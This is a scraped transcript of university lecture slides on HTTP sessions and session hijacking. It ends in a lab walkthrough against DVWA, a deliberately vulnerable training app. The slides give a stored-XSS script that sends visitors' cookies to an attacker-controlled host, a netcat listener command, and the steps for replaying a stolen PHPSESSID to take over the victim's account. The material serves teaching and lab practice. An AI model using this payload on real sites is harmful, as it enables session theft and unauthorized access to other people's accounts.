Presentation is loading. Please wait.

Presentation is loading. Please wait.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

Published byGraham Clemons Modified over 9 years ago

Similar presentations

Presentation on theme: "NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba."— Presentation transcript:

1 NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba Czech Republic Session Hijacking

2 navy.cs.vsb.cz 2 HTTP protocol The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative, hypermedia information systems. HTTP has been in use by the World-Wide Web global information initiative since 1990.

3 navy.cs.vsb.cz 3 HTTP protocol RFC 7230 - HTTP/1.1: Message Syntax and Routing RFC 7230 RFC 7231 - HTTP/1.1: Semantics and Content RFC 7231 RFC 7232 - HTTP/1.1: Conditional Requests RFC 7232 RFC 7233 - HTTP/1.1: Range Requests RFC 7233 RFC 7234 - HTTP/1.1: Caching RFC 7234 RFC 7235 - HTTP/1.1: Authentication RFC 7235 (http://trac.tools.ietf.org/)

4 navy.cs.vsb.cz 4 HTTP protocol Client request: GET /hello.txt HTTP/1.1 User-Agent: curl/7.16.3 libcurl/7.16.3 OpenSSL/0.9.7l zlib/1.2.3 Host: www.example.com Accept-Language: en, mi …

5 navy.cs.vsb.cz 5 HTTP protocol Server response: HTTP/1.1 200 OK Date: Mon, 27 Jul 2009 12:28:53 GMT Server: Apache Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT ETag: "34aa387-d-1568eb00" Accept-Ranges: bytes Content-Length: 51 Vary: Accept-Encoding Content-Type: text/plain Hello World! My payload includes a trailing CRLF.

6 navy.cs.vsb.cz 6 Session Is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and user (Login session). A session is set up or established at a certain point in time, and then torn down at some later point. – An established communication session may involve more than one message in each direction. A session is typically, stateful, meaning that at least one of the communicating parts needs to save information about the session history in order to be able to communicate, as opposed to stateless communication, where the communication consists of independent requests with responses.

7 navy.cs.vsb.cz 7 Session An HTTP session is a sequence of network request- response transactions. – An HTTP client initiates a request by establishing a Transmission Control Protocol (TCP) connection to a particular port on a server (typically port 80). – An HTTP server listening on that port waits for a client's request message. – Upon receiving the request, the server sends back a status line, such as "HTTP/1.1 200 OK", and a message of its own. – The body of this message is typically the requested resource, although an error message or other information may also be returned.

8 navy.cs.vsb.cz 8 Session

9 navy.cs.vsb.cz 9 Session HTTP is a stateless protocol. HTTP server require sessions to retain information or status about each user for the duration of multiple requests. Some web applications implement states or server side sessions using for instance HTTP cookies or hidden variables within web forms or encoded parameters in URL

10 navy.cs.vsb.cz 10 Session

11 navy.cs.vsb.cz 11 Session hijacking Session hijacking is when a attacker takes over a session between two systems (machines). The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. – Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. – The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. – A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition. The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.

12 navy.cs.vsb.cz 12 Session hijacking The session token could be compromised in different ways; the most common are: – Predictable session token – Session Sniffing – Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.) – Man-in-the-middle attack

13 navy.cs.vsb.cz 13 Session hijacking - Session Sniffing

14 navy.cs.vsb.cz 14 Session hijacking– Man in the middle

15 navy.cs.vsb.cz 15 Session hijacking – XSS (Cross Site Scripting)

16 navy.cs.vsb.cz 16 Session hijacking – XSS (Cross Site Scripting) IMG SRC SCRIPT SRC IFRAME SRC JavaScript Image Object var img = new Image(); img.src = "http://host/?command"; 'XMLHTTP' Object in IE var post_data = 'name=value'; var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); xmlhttp.open("POST", 'http://url/path/file.ext', true); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { alert(xmlhttp.responseText); } }; xmlhttp.send(post_data); 'XMLHTTP' Object in Mozilla var post_data = 'name=value'; var xmlhttp=new XMLHttpRequest(); xmlhttp.open("POST", 'http://url/path/file.ext', true); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { alert(xmlhttp.responseText); } }; xmlhttp.send(post_data);

17 navy.cs.vsb.cz 17 Demo - Tools Hosted web application (DVWA) Basic knowledge of JavaScript Custom application able to handle HTTP request (i.e. Netcat - http://www.linuxcommand.org/man_pages/n c1.html)

18 navy.cs.vsb.cz 18 Demo 1.Attacker logs into target web application as a common user. http://127.0.0.1/dvwa/login.php User name: smithy Password: password 2.Try XSS vulnerability of text input. Type in: < alert('XSS!'); alert(document.cookie);

19 navy.cs.vsb.cz 19 Demo

20 navy.cs.vsb.cz 20 Demo Attacker logs in into Kali Linux Username: root Password: toor Determine your attacker’s IP address root@kali:~# ifconfig eth0

21 navy.cs.vsb.cz 21 Demo Use Netcat utility to listen incoming HTTP requests (TCP port 80) root@kali:~# netcat -lvp 80 -l … listen mode, for inbound connects -v … verbose [use twice to be more verbose] -p port... local port number

22 navy.cs.vsb.cz 22 Demo In DVWA navigate to XSS Stored (Guest Book) section – This section represents guest book. Records are stored in DB. Add new record with your malicious script which will hijack victim’s session ID – HOST is your attacker’s PC IP address

23 navy.cs.vsb.cz 23 Demo var img = new Image(); img.src = "http://HOST/MyNetcatServiceListener?cookie="+document. cookie;

24 navy.cs.vsb.cz 24 Demo Now whoever visits the GuestBook will execute your XSS code and send cookie with SESSIONID to your attacker's PC

25 navy.cs.vsb.cz 25 Demo Use the hijacked Cookie to bypass the authentication. In your attacker’s PC open browser and navigate to DVWA web page.

26 navy.cs.vsb.cz 26 Demo Open Tamper Data plugin and start Tamper. Fill in non existing user name and password to get your own session. In Tamper Data plugin edit PHPSESSID value to the value you have received from hijacked Cookie

27 navy.cs.vsb.cz 27 Demo

28 navy.cs.vsb.cz 28 Demo You will get Authentication failed message (you entered non existing credentials)

29 navy.cs.vsb.cz 29 Demo Now navigate back to the root of the web page and you should be logged in under your victim’s account. Done!

30 navy.cs.vsb.cz 30 References DVWA - http://www.dvwa.co.uk/http://www.dvwa.co.uk/ Netcat tool - http://netcat.sourceforge.net/http://netcat.sourceforge.net/ CSRF - http://www.cgisecurity.com/csrf-faq.htmlhttp://www.cgisecurity.com/csrf-faq.html https://www.owasp.org/index.php/XSS_Filter_Ev asion_Cheat_Sheet HACKING EXPOSED (ISBN: 978-0-07-161375-0) Penetration testing (ISBN-10: 1-59327-564-1) Principles of Computer Security (ISBN: 978-0-07- 174857-5)

31 navy.cs.vsb.cz 31 Warning Hacking is illegal because it is getting into a system another person owns. If you wanted to do legal hacking then you would have to own the system.

Download ppt "NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba."

Similar presentations

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Presenter: James Huang Date: Sept. 29, 2014 1.  HTTP and WWW  Bottle Web Framework  Request Routing  Sending Static Files  Handling HTML  HTTP Errors.

Presenter: James Huang Date: Sept. 29,  HTTP and WWW  Bottle Web Framework  Request Routing  Sending Static Files  Handling HTML  HTTP Errors.
Parameter Tampering. Attacking the Ecommerce Shopping Cart In the above image we see that a user who wants to purchase a Television visits an online Store.

Parameter Tampering. Attacking the Ecommerce Shopping Cart In the above image we see that a user who wants to purchase a Television visits an online Store.
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
HTTP HyperText Transfer Protocol. HTTP Uses TCP as its underlying transport protocol Uses port 80 Stateless protocol (i.e. HTTP Server maintains no information.

HTTP HyperText Transfer Protocol. HTTP Uses TCP as its underlying transport protocol Uses port 80 Stateless protocol (i.e. HTTP Server maintains no information.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
How the web works: HTTP and CGI explained

How the web works: HTTP and CGI explained
The World Wide Web and the Internet Dr Jim Briggs 1WUCM1.

The World Wide Web and the Internet Dr Jim Briggs 1WUCM1.
Chapter 2 Application Layer Computer Networking: A Top Down Approach Featuring the Internet, 3 rd edition. Jim Kurose, Keith Ross Addison-Wesley, July.

Chapter 2 Application Layer Computer Networking: A Top Down Approach Featuring the Internet, 3 rd edition. Jim Kurose, Keith Ross Addison-Wesley, July.
Web, HTTP and Web Caching

Web, HTTP and Web Caching
2/9/2004 Web and HTTP February 9, 2004. 2/9/2004 Assignments Due – Reading and Warmup Work on Message of the Day.

2/9/2004 Web and HTTP February 9, /9/2004 Assignments Due – Reading and Warmup Work on Message of the Day.
Hypertext Transport Protocol CS - 328 Dick Steflik.

Hypertext Transport Protocol CS Dick Steflik.
RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.

RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Web technologies and programming cse4461 - hypermedia and multimedia technology Fanis Tsandilas April 3, 2007.

Web technologies and programming cse hypermedia and multimedia technology Fanis Tsandilas April 3, 2007.
Web Hacking 1. Overview Why web HTTP Protocol HTTP Attacks 2.

Web Hacking 1. Overview Why web HTTP Protocol HTTP Attacks 2.
Simple Web Services. Internet Basics The Internet is based on a communication protocol named TCP (Transmission Control Protocol) TCP allows programs running.

Simple Web Services. Internet Basics The Internet is based on a communication protocol named TCP (Transmission Control Protocol) TCP allows programs running.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Web Server Design Week 5 Old Dominion University Department of Computer Science CS 495/595 Spring 2010 Martin Klein 2/10/10.

Web Server Design Week 5 Old Dominion University Department of Computer Science CS 495/595 Spring 2010 Martin Klein 2/10/10.

Similar presentations

Ads by Google